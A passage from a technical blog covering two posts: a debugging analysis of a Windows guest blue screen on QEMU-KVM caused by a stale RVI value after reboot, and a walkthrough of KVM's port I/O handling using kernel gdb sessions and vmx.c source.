04 fffff800`016442a3 : 00000000`00000001 fffff800`0080e4b0 fffff800`0080e4b0 00000000`00000001 : hal!HalpInitializeClock+0x1c9
05 fffff800`01c01d0a : fffff800`0080e4b0 fffff800`0080e4b0 fffff800`013d8780 fffff800`016c0c86 : hal!HalpInitSystem+0x29b
06 fffff800`0191cfa3 : fffff800`00000000 fffff800`01846e80 fffff800`013d8780 00000000`00000001 : nt!InitBootProcessor+0x12a
07 fffff800`0190a8a6 : 00000000`00000230 fffff800`02b28588 fffff800`013d8b30 00000001`00000000 : nt!KiInitializeKernel+0x833
08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemStartup+0x196
</code></pre></div></div>
<p>It is obvious that the function ‘HalpInitializeClock’ failed and triggered a bugcheck. Disassemble it and it is easy to see that the bugcheck occurs when it calls ‘HalpWaitForPhase0ClockTick’ and that function returns failure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kd> uf HalpInitializeClock
hal!HalpInitializeClock:
fffff800`01bff0ec 4889742408 mov qword ptr [rsp+8],rsi
fffff800`01bff0f1 9c pushfq
fffff800`01bff0f2 4883ec50 sub rsp,50h
fffff800`01bff0f6 488b0503600100 mov rax,qword ptr [hal!_security_cookie (fffff800`01c15100)]
fffff800`01bff0fd 4833c4 xor rax,rsp
fffff800`01bff100 4889442440 mov qword ptr [rsp+40h],rax
fffff800`01bff105 8b0dc1a20100 mov ecx,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
...
hal!HalpInitializeClock+0x19c:
fffff800`01bff287 b9b80b0000 mov ecx,0BB8h
fffff800`01bff28c e8e3fdffff call hal!HalpWaitForPhase0ClockTick (fffff800`01bff074)
fffff800`01bff291 84c0 test al,al
fffff800`01bff293 7520 jne hal!HalpInitializeClock+0x1ca (fffff800`01bff2b5)
hal!HalpInitializeClock+0x1aa:
fffff800`01bff295 4c630530a10100 movsxd r8,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
fffff800`01bff29c 488364242000 and qword ptr [rsp+20h],0
fffff800`01bff2a2 4533c9 xor r9d,r9d
fffff800`01bff2a5 418d495c lea ecx,[r9+5Ch]
fffff800`01bff2a9 ba0b010000 mov edx,10Bh
fffff800`01bff2ae ff153c000100 call qword ptr [hal!_imp_KeBugCheckEx (fffff800`01c0f2f0)]
fffff800`01bff2b4 cc int 3
...
fffff800`01bff2da c3 ret
</code></pre></div></div>
<p>Just paste “HalpWaitForPhase0ClockTick” into Google and you will find this bugzilla:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://bugzilla.redhat.com/show_bug.cgi?id=1387054
</code></pre></div></div>
<p>It seems to be the same issue, differing only in the bugcheck’s second parameter, which is ‘1’ in the bugzilla but ‘3’ in our BSOD. So I found the patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1
</code></pre></div></div>
<p>After applying this patch and rebooting the guest several times, there was no BSOD. The whole process took me only ten minutes, and life seemed OK again. Over? Of course not; I was curious about this issue and wanted to know more beneath the surface of this BSOD.</p>
<h2 id="1">Analysis in Windows kernel side</h2>
<p>Let’s look at the backtrace in WinDbg in more detail.</p>
<p>If you have some background on Windows startup, you will recognize that this backtrace shows the BSOD happened during Phase 0 initialization. In this phase only one processor, called the boot processor, gets initialized. In the backtrace we can see Windows initializing the clock. From the BSOD summary we see “x64_0x5c_hal_clock_interrupt_not_received”, which indicates the issue: Windows did not receive clock interrupts.</p>
<p>Let’s look at the decompiled code of function “HalpWaitForPhase0ClockTick”. This is the function’s main logic.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char __fastcall HalpWaitForPhase0ClockTick(unsigned int a1)
{
unsigned __int64 v1; // rbx
v1 = ((unsigned __int64)((HalpProc0TSCHz * (unsigned __int64)a1 * (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)
+ ((unsigned __int64)(HalpProc0TSCHz * a1
- (HalpProc0TSCHz
* (unsigned __int64)a1
* (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)) >> 1)) >> 9)
+ __rdtsc();
HalpProcessorFence();
if ( HalpPhase0ClockInterruptCount )
return 1;
while ( __rdtsc() <= v1 )
{
if ( HalpPhase0ClockInterruptCount )
return 1;
}
return 0;
}
char HalpHpetClockInterruptStub()
{
++HalpPhase0ClockInterruptCount;
return 1;
}
</code></pre></div></div>
<p>Here ‘HalpPhase0ClockInterruptCount’ counts the clock interrupts; it is incremented on every timer interrupt. It is easy to see that this function waits for an interrupt until the deadline v1 passes (from the Red Hat bugzilla, that is 3s). From Vadim Rozenfeld I learned that this is a common technique in the Windows kernel: the HAL initialization process waits for a period of time considered long enough to complete an initialization action, in this case the clock. So the BSOD on the Windows side is clear: when the guest initializes the clock, it waits some time (3s) to ensure a timer interrupt has been delivered (observed through HalpPhase0ClockInterruptCount). It never sees this interrupt, concludes the clock is not working properly, and triggers this BSOD.</p>
<h2 id="2">Analysis in KVM side</h2>
<p>Now that we know the story on the Windows side, let’s look at the KVM side.
Though I’m familiar with CPU/memory/device virtualization in the qemu/kvm stack, to be honest I’m not familiar with interrupt virtualization. Let’s look at the patch <a href="https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1">KVM: x86: reset RVI upon system reset</a>; the commit message says:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "A bug was reported as follows: when running Windows 7 32-bit guests on qemu-kvm,
sometimes the guests run into blue screen during reboot. The problem was that a
guest's RVI was not cleared when it rebooted. This patch has fixed the problem."
</code></pre></div></div>
<p>This patch clears the RVI on reboot. First, let’s look at the reboot path.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm_vcpu_ioctl(CPU(s->cpu), KVM_SET_LAPIC, &kapic);
-->kvm_vcpu_ioctl_set_lapic
-->kvm_apic_post_state_restore
-->vmx_hwapic_irr_update
-->vmx_set_rvi
</code></pre></div></div>
<p>The latter two functions were added by the patch.
Here is a brief introduction of the relevant registers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>IRR: Interrupt Request Register. If the nth bit is set, the LAPIC has received interrupt vector n but has not yet delivered it to the CPU.
RVI: Requesting Virtual Interrupt. The low byte of the guest interrupt status; the processor
treats this value as the vector of the highest-priority virtual interrupt that is requesting service.
SVI: Servicing Virtual Interrupt. The high byte of the guest interrupt status; the processor
treats this value as the vector of the highest-priority virtual interrupt that is in service.
EOI: End Of Interrupt. Software writes this register at the end of an interrupt handler to notify the (virtual) APIC that it may deliver the next interrupt.
ISR: In-Service Register. If the nth bit is set, the CPU is servicing interrupt vector n but has not yet completed it.
</code></pre></div></div>
<p>RVI and SVI exist only in the virtual APIC; they characterize part of the guest’s virtual-APIC state and
do not correspond to any processor or APIC registers.
The general flow is: an interrupt is first set in the IRR and reflected into RVI; when the guest accepts the interrupt, the corresponding ISR bit is set; when the handler finishes, it writes the EOI register to notify the virtual APIC to deliver the next interrupt.</p>
<p>In this BSOD case, the RVI register was not cleared across the reboot, and its vector has a higher priority than the timer interrupt. Since this happens early in Windows initialization, there may be no handler registered for the stale RVI vector, so nothing services it. Because the stale vector outranks the timer interrupt and its ISR bit in the virtual APIC never gets cleared, the virtual APIC never delivers the timer interrupt, which makes Windows BSOD.</p>
<h2 id="3">Reference</h2>
<ol>
<li>
<p>SDM 24.4.2</p>
</li>
<li>
<p>Mctrain’s Blog: <a href="http://ytliu.info/blog/2016/12/24/zhong-duan-chu-li-de-na-xie-shi-er/">中断处理的那些事儿</a></p>
</li>
</ol>
PIO handling in QEMU-KVM2017-07-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/07/10/kvm-pio
<ul>
<li>
<p><a href="#0">0. Preparation</a></p>
</li>
<li>
<p><a href="#1">1. Registering I/O ports in KVM</a></p>
</li>
<li>
<p><a href="#2">2. Handling the out path of PIO</a></p>
</li>
<li>
<p><a href="#3">3. Handling the in path of PIO</a></p>
</li>
<li>
<p><a href="#4">4. References</a></p>
</li>
</ul>
<p>We all know that in a kvm/qemu virtual machine, reading from or writing to an I/O port (for the vast majority of ports) traps into KVM. But what exactly is the process, and how do the guest, KVM, and QEMU interact to complete this emulation? This article explores that question by debugging KVM to uncover what happens underneath.</p>
<h2 id="0">0. Preparation</h2>
<p>To do a good job, one must first sharpen one’s tools. To understand how KVM intercepts and handles PIO, we first need to debug KVM, which requires a two-machine kernel debugging setup; there are plenty of examples online. Note that on 4.x kernels clearing the write protection of the kernel text is somewhat problematic, so this article uses a 3.x kernel, specifically 3.10.105. Our environment is therefore a target running the 3.10.105 kernel; the debugger side can be anything.</p>
<p>If we debugged a full kvm/qemu setup directly, the huge number of vm exits in a complete environment would interfere with our analysis. Here we only need a minimal virtual machine built with the KVM API that executes in/out instructions in the guest. There are many such examples online, e.g. <a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a> and
<a href="http://www.linuxjournal.com/magazine/linux-kvm-learning-tool">Linux KVM as a Learning
Tool</a>.</p>
<p>Here we use the first example. First, get the code from</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://github.com/soulxu/kvmsample
</code></pre></div></div>
<p>Clone the code and run make; if the kvm module is loaded you should see output. KVM API usage is not covered here; reading either of the two articles above is enough. QEMU, though complex, essentially runs the same way. The guest in this example writes data to a port.</p>
<h2 id="1">1. Registering I/O ports in KVM</h2>
<p>First we need to be clear that I/O ports are how the CPU exchanges data with peripherals, and not all CPUs have them. From the virtual machine’s point of view there are no real I/O ports, so accesses must be caught via vm exit.</p>
<p>Whether I/O instructions are intercepted is decided by two fields in the VM-Execution controls of the VMCS. See Intel SDM 24.6.2:</p>
<p><img src="/assets/img/pio/1.png" alt="" /></p>
<p>We can see that if the “Use I/O bitmaps” bit is set, “Unconditional I/O exiting” has no effect. If a bit in the I/O bitmap is set to 1, accessing the corresponding port causes a vm exit; otherwise the guest can access it directly. The addresses of the I/O bitmaps are stored in the I/O-Bitmap Addresses field of the VMCS; in fact there are two I/O bitmaps, which we call A and B. Look at the SDM again:</p>
<p><img src="/assets/img/pio/2.png" alt="" /></p>
<p>Each bitmap is 4 KB, i.e. one page. Bitmap A covers ports 0000H to 7FFFH (4*1024*8 bits), and bitmap B covers ports 8000H to FFFFH.</p>
<p>Now that we understand I/O port interception in theory, let’s look at the KVM code.</p>
<p>First, arch/x86/kvm/vmx.c defines two global variables holding the addresses of bitmaps A and B. In vmx_init each pointer is allocated one page, all bits are set to 1, and then bit 0x80 of bitmap A is cleared, so guest accesses to port 0x80 do not cause a vm exit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static unsigned long *vmx_io_bitmap_a;
static unsigned long *vmx_io_bitmap_b;
static int __init vmx_init(void)
{
vmx_io_bitmap_a = (unsigned long *)__get_free_page(GFP_KERNEL);
vmx_io_bitmap_b = (unsigned long *)__get_free_page(GFP_KERNEL);
/*
* Allow direct access to the PC debug port (it is often used for I/O
* delays, but the vmexits simply slow things down).
*/
memset(vmx_io_bitmap_a, 0xff, PAGE_SIZE);
clear_bit(0x80, vmx_io_bitmap_a);
memset(vmx_io_bitmap_b, 0xff, PAGE_SIZE);
...
}
</code></pre></div></div>
<p>In the same file we can see that when the vcpu is set up, the addresses of bitmaps A and B are written into the VMCS, which establishes the interception of I/O port accesses.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int vmx_vcpu_setup(struct vcpu_vmx *vmx)
{
/* I/O */
vmcs_write64(IO_BITMAP_A, __pa(vmx_io_bitmap_a));
vmcs_write64(IO_BITMAP_B, __pa(vmx_io_bitmap_b));
return 0;
}
</code></pre></div></div>
<h2 id="2">2. Handling the out path of PIO</h2>
<p>In this section we explore how KVM handles the out instruction. First, modify the test.S code from the sample so that it performs out only once.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
out %ax, $0x10
inc %ax
hlt
</code></pre></div></div>
<p>After the guest causes a vm exit, KVM invokes a handler according to the exit reason. This is also in vmx.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int (*const kvm_vmx_exit_handlers[])(struct kvm_vcpu *vcpu) = {
[EXIT_REASON_EXCEPTION_NMI] = handle_exception,
[EXIT_REASON_EXTERNAL_INTERRUPT] = handle_external_interrupt,
[EXIT_REASON_TRIPLE_FAULT] = handle_triple_fault,
[EXIT_REASON_NMI_WINDOW] = handle_nmi_window,
[EXIT_REASON_IO_INSTRUCTION] = handle_io,
...
}
</code></pre></div></div>
<p>Here the callback handling I/O is handle_io. On the target we execute:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu:/home/test# echo g >/proc/sysrq-trigger
</code></pre></div></div>
<p>This makes gdb on the debugger machine break in; set a breakpoint on handle_io:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b handle_io
Breakpoint 1 at 0xffffffff81037dca: file arch/x86/kvm/vmx.c, line 4816.
(gdb) c
</code></pre></div></div>
<p>Next, start kvmsample on the target under gdb and set a breakpoint at line 84 of main.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/kvmsample$ gdb ./kvmsample
...
Reading symbols from ./kvmsample...done.
(gdb) b ma
main main.c malloc malloc@plt
(gdb) b main.c:84
Breakpoint 1 at 0x400cac: file main.c, line 84.
</code></pre></div></div>
<p>Line 84 is exactly where the KVM_RUN ioctl returns.</p>
<p><img src="/assets/img/pio/3.png" alt="" /></p>
<p>Now type r, and the debugger breaks in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb)
</code></pre></div></div>
<p>From the code of handle_io we can see that it first reads exit information from the VMCS, including whether the access is an in or an out, its size, and the port number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_io(struct kvm_vcpu *vcpu)
{
unsigned long exit_qualification;
int size, in, string;
unsigned port;
exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
string = (exit_qualification & 16) != 0;
in = (exit_qualification & 8) != 0;
++vcpu->stat.io_exits;
if (string || in)
return emulate_instruction(vcpu, 0) == EMULATE_DONE;
port = exit_qualification >> 16;
size = (exit_qualification & 7) + 1;
skip_emulated_instruction(vcpu);
return kvm_fast_pio_out(vcpu, size, port);
}
</code></pre></div></div>
<p>Then, after skip_emulated_instruction advances the guest’s rip, kvm_fast_pio_out is called. In that function we first read the guest’s rax, which holds the data written to the port, here 0xa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_fast_pio_out(struct kvm_vcpu *vcpu, int size, unsigned short port)
{
unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
size, port, &val, 1);
/* do not return to emulator after return from userspace */
vcpu->arch.pio.count = 0;
return ret;
}
</code></pre></div></div>
<p>We can check the data in gdb:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb) n
4825 ++vcpu->stat.io_exits;
(gdb) n
4827 if (string || in)
(gdb) n
4832 skip_emulated_instruction(vcpu);
(gdb) n
[New Thread 3654]
4834 return kvm_fast_pio_out(vcpu, size, port);
(gdb) s
kvm_fast_pio_out (vcpu=0xffff8800ac528000, size=16, port=16)
at arch/x86/kvm/x86.c:5086
5086 {
(gdb) n
[New Thread 3656]
5087 unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
(gdb) n
[New Thread 3657]
5088 int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
(gdb) p /x val
$1 = 0xa
(gdb)
</code></pre></div></div>
<p>Further down, emulator_pio_out_emulated copies the value into vcpu-&gt;arch.pio_data and then calls emulator_pio_in_out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_out_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port,
const void *val, unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
memcpy(vcpu->arch.pio_data, val, size * count);
return emulator_pio_in_out(vcpu, size, port, (void *)val, count, false);
}
static int emulator_pio_in_out(struct kvm_vcpu *vcpu, int size,
unsigned short port, void *val,
unsigned int count, bool in)
{
trace_kvm_pio(!in, port, size, count);
vcpu->arch.pio.port = port;
vcpu->arch.pio.in = in;
vcpu->arch.pio.count = count;
vcpu->arch.pio.size = size;
if (!kernel_pio(vcpu, vcpu->arch.pio_data)) {
vcpu->arch.pio.count = 0;
return 1;
}
vcpu->run->exit_reason = KVM_EXIT_IO;
vcpu->run->io.direction = in ? KVM_EXIT_IO_IN : KVM_EXIT_IO_OUT;
vcpu->run->io.size = size;
vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
vcpu->run->io.count = count;
vcpu->run->io.port = port;
return 0;
}
</code></pre></div></div>
<p>In the latter function, vcpu-&gt;run-&gt;io.data_offset is set to 4096. The value we wrote to the port has already been copied into vcpu-&gt;arch.pio_data by memcpy, and debugging reveals the trick: vcpu-&gt;arch.pio_data is located exactly one page after kvm_run. This can also be seen in kvm_vcpu_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4405 vcpu->run->io.size = size;
(gdb) n
[New Thread 3667]
4406 vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
(gdb) n
4407 vcpu->run->io.count = count;
(gdb) n
4408 vcpu->run->io.port = port;
(gdb) p count
$7 = 1
(gdb) n
4410 return 0;
(gdb) x /2b 0xffff88002a2a2000+0x1000
0xffff88002a2a3000: 0x0a 0x00
(gdb) p vcpu->run
$9 = (struct kvm_run *) 0xffff88002a2a2000
(gdb) p vcpu->arch.pio_data
$10 = (void *) 0xffff88002a2a3000
(gdb)
</code></pre></div></div>
<p>So vcpu-&gt;run-&gt;io holds the basic PIO information such as size and port number, while the page after run, vcpu-&gt;arch.pio_data, holds the data actually written by out. Let the target continue, and we break back into the kvmsample program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) p kvm->vcpus->kvm_run->io
$2 = {direction = 1 '\001', size = 2 '\002', port = 16, count = 1,
data_offset = 4096}
(gdb)
</code></pre></div></div>
<p>A quick word about kvm_run: it is a structure used for communication between the vcpu and a user-space program (typically QEMU). The user-space program obtains its size with the KVM_GET_VCPU_MMAP_SIZE ioctl and then maps it into user space.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x /2b 0x7ffff7ff4000+0x1000
0x7ffff7ff5000: 10
</code></pre></div></div>
<p>Through gdb we can see that both the data the guest wrote and the port number can be read from user space. This sample program merely prints the data; QEMU would look up the device corresponding to the port and invoke its callback.</p>
<p>Overall, the flow of the out instruction is very simple: the guest writes the port, traps into KVM, and KVM returns to user space for handling.</p>
<h2 id="3">3. Handling the in path of PIO</h2>
<p>Although both reads and writes of guest ports cause vm exits, a little thought shows that out and in must differ: out only needs the guest to write a value, while in must bring data back. So the flow should be: the guest issues an in, KVM handles it and returns to user space, user space fills the data into the kvm_run structure, and then KVM performs a vm entry so the data reaches the guest.</p>
<p>We make a simple modification to the sample program: in test.S we first read a value from port 0x10 (this value will be 0xbeff) and then write it to port 0x10.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test.S
# A test code for kvmsample
.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
in $0x10,%ax
out %ax, $0x10
hlt
</code></pre></div></div>
<p>Make the following change to main.c:</p>
<p><img src="/assets/img/pio/5.png" alt="" /></p>
<p>When handling KVM_EXIT_IO we now distinguish between in and out; for in we copy 0xbeff across, and then the guest writes this value to port 0x10 with out.</p>
<p>The first trap of the in instruction is still handled by handle_io in KVM, but this time it takes a different path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 486 hit Breakpoint 1, handle_io (vcpu=0xffff88011d428000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb)
4825 ++vcpu->stat.io_exits;
(gdb)
4827 if (string || in)
(gdb)
4828 return emulate_instruction(vcpu, 0) == EMULATE_DONE;
(gdb) s
emulate_instruction (emulation_type=<optimized out>, vcpu=<optimized out>)
at /home/test/linux-3.10.105/arch/x86/include/asm/kvm_host.h:811
811 return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
(gdb) s
</code></pre></div></div>
<p>x86_emulate_instruction is called; the two most important functions it invokes are x86_decode_insn and x86_emulate_insn.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_instruction(struct kvm_vcpu *vcpu,
unsigned long cr2,
int emulation_type,
void *insn,
int insn_len)
{
int r;
struct x86_emulate_ctxt *ctxt = &vcpu->arch.emulate_ctxt;
bool writeback = true;
bool write_fault_to_spt = vcpu->arch.write_fault_to_shadow_pgtable;
/*
* Clear write_fault_to_shadow_pgtable here to ensure it is
* never reused.
*/
vcpu->arch.write_fault_to_shadow_pgtable = false;
kvm_clear_exception_queue(vcpu);
if (!(emulation_type & EMULTYPE_NO_DECODE)) {
init_emulate_ctxt(vcpu);
r = x86_decode_insn(ctxt, insn, insn_len);
}
restart:
r = x86_emulate_insn(ctxt);
if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
r = EMULATE_DO_MMIO;
if (writeback) {
toggle_interruptibility(vcpu, ctxt->interruptibility);
kvm_set_rflags(vcpu, ctxt->eflags);
kvm_make_request(KVM_REQ_EVENT, vcpu);
vcpu->arch.emulate_regs_need_sync_to_vcpu = false;
kvm_rip_write(vcpu, ctxt->eip);
} else
vcpu->arch.emulate_regs_need_sync_to_vcpu = true;
return r;
}
EXPORT_SYMBOL_GPL(x86_emulate_instruction);
</code></pre></div></div>
<p>The first function, x86_decode_insn, as its name suggests, decodes the current instruction.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_decode_insn(struct x86_emulate_ctxt *ctxt, void *insn, int insn_len)
{
/* Legacy prefixes. */
for (;;) {
switch (ctxt->b = insn_fetch(u8, ctxt)) {
}
/* Opcode byte(s). */
opcode = opcode_table[ctxt->b];
/* Two-byte opcode? */
if (ctxt->b == 0x0f) {
ctxt->twobyte = 1;
ctxt->b = insn_fetch(u8, ctxt);
opcode = twobyte_table[ctxt->b];
}
ctxt->d = opcode.flags;
ctxt->execute = opcode.u.execute;
ctxt->check_perm = opcode.check_perm;
ctxt->intercept = opcode.intercept;
rc = decode_operand(ctxt, &ctxt->src, (ctxt->d >> SrcShift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/*
* Decode and fetch the second source operand: register, memory
* or immediate.
*/
rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
if (rc != X86EMUL_CONTINUE)
goto done;
/* Decode and fetch the destination operand: register or memory. */
rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
}
</code></pre></div></div>
<p>First insn_fetch fetches the instruction; the debug session below shows that the fetched byte is exactly the machine code of our in instruction:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb)
4366 switch (ctxt->b = insn_fetch(u8, ctxt)) {
(gdb)
4414 if (ctxt->rex_prefix & 8)
(gdb) p ctxt->b
$38 = 229 '\345'
(gdb) p /x ctxt->b
$39 = 0xe5
</code></pre></div></div>
<p>Then the opcode is looked up in opcode_table to find the corresponding callback, which is assigned to ctxt-&gt;execute. For our in instruction this callback is em_in.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4472 ctxt->execute = opcode.u.execute;
(gdb)
4473 ctxt->check_perm = opcode.check_perm;
(gdb) p ctxt->execute
$41 = (int (*)(struct x86_emulate_ctxt *)) 0xffffffff81027238 <em_in>
(gdb) n
</code></pre></div></div>
<p>Next, decode_operand is called three times to fetch the instruction’s operands. From the debug output we can see that the source operand is ctxt-&gt;src-&gt;val=16 (the port number), and the destination register to write is RAX, i.e. ctxt-&gt;dst-&gt;addr.reg.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) n
4528 rc = decode_operand(ctxt, &ctxt->src2, (ctxt->d >> Src2Shift) & OpMask);
(gdb) n
4529 if (rc != X86EMUL_CONTINUE)
(gdb) p ctxt->src->val
$42 = 16
(gdb) n
4533 rc = decode_operand(ctxt, &ctxt->dst, (ctxt->d >> DstShift) & OpMask);
(gdb) s
...
(gdb) p op->addr.reg
$46 = (unsigned long *) 0xffff88011d4296c8
(gdb) p ctxt->_regs[0]
$47 = 10
(gdb) p &ctxt->_regs[0]
$48 = (unsigned long *) 0xffff88011d4296c8
</code></pre></div></div>
<p>Back in x86_emulate_instruction, decoding is followed by execution, which is implemented by calling x86_emulate_insn.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_insn(struct x86_emulate_ctxt *ctxt)
{
const struct x86_emulate_ops *ops = ctxt->ops;
int rc = X86EMUL_CONTINUE;
int saved_dst_type = ctxt->dst.type;
if (ctxt->execute) {
if (ctxt->d & Fastop) {
void (*fop)(struct fastop *) = (void *)ctxt->execute;
rc = fastop(ctxt, fop);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
rc = ctxt->execute(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
goto writeback;
}
writeback:
rc = writeback(ctxt);
if (rc != X86EMUL_CONTINUE)
goto done;
done:
if (rc == X86EMUL_PROPAGATE_FAULT)
ctxt->have_exception = true;
if (rc == X86EMUL_INTERCEPTED)
return EMULATION_INTERCEPTED;
if (rc == X86EMUL_CONTINUE)
writeback_registers(ctxt);
return (rc == X86EMUL_UNHANDLEABLE) ? EMULATION_FAILED : EMULATION_OK;
}
</code></pre></div></div>
<p>The most important step, of course, is invoking the callback:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rc = ctxt->execute(ctxt);
</code></pre></div></div>
<p>From the decoding above we already know this is em_in; the related functions are as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int em_in(struct x86_emulate_ctxt *ctxt)
{
if (!pio_in_emulated(ctxt, ctxt->dst.bytes, ctxt->src.val,
&ctxt->dst.val))
return X86EMUL_IO_NEEDED;
return X86EMUL_CONTINUE;
}
static int pio_in_emulated(struct x86_emulate_ctxt *ctxt,
unsigned int size, unsigned short port,
void *dest)
{
struct read_cache *rc = &ctxt->io_read;
if (rc->pos == rc->end) { /* refill pio read ahead */
...
rc->pos = rc->end = 0;
if (!ctxt->ops->pio_in_emulated(ctxt, size, port, rc->data, n))
return 0;
rc->end = n * size;
}
if (ctxt->rep_prefix && !(ctxt->eflags & EFLG_DF)) {
ctxt->dst.data = rc->data + rc->pos;
ctxt->dst.type = OP_MEM_STR;
ctxt->dst.count = (rc->end - rc->pos) / size;
rc->pos = rc->end;
} else {
memcpy(dest, rc->data + rc->pos, size);
rc->pos += size;
}
return 1;
}
static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port, void *val,
unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
int ret;
if (vcpu->arch.pio.count)
goto data_avail;
ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
if (ret) {
data_avail:
memcpy(val, vcpu->arch.pio_data, size * count);
vcpu->arch.pio.count = 0;
return 1;
}
return 0;
}
</code></pre></div></div>
<p>In the last function, since vcpu-&gt;arch.pio.count has no data yet (it must be provided by user space), emulator_pio_in_out is executed. We have seen this function before: it fills in the kvm_run fields so that user space can supply the data.</p>
<p>After x86_emulate_insn finishes, the flow returns to x86_emulate_instruction; the key step is setting the vcpu-&gt;arch.complete_userspace_io callback.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (ctxt->have_exception) {
inject_emulated_exception(vcpu);
r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
if (!vcpu->arch.pio.in)
vcpu->arch.pio.count = 0;
else {
writeback = false;
vcpu->arch.complete_userspace_io = complete_emulated_pio;
}
</code></pre></div></div>
<p>With that, this vm exit is complete and control returns to the user-space KVM_RUN ioctl. User space finds it is a KVM_EXIT_IO with direction KVM_EXIT_IO_IN, so it fills 0xbeff into kvm_run.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case KVM_EXIT_IO:
printf("KVM_EXIT_IO\n");
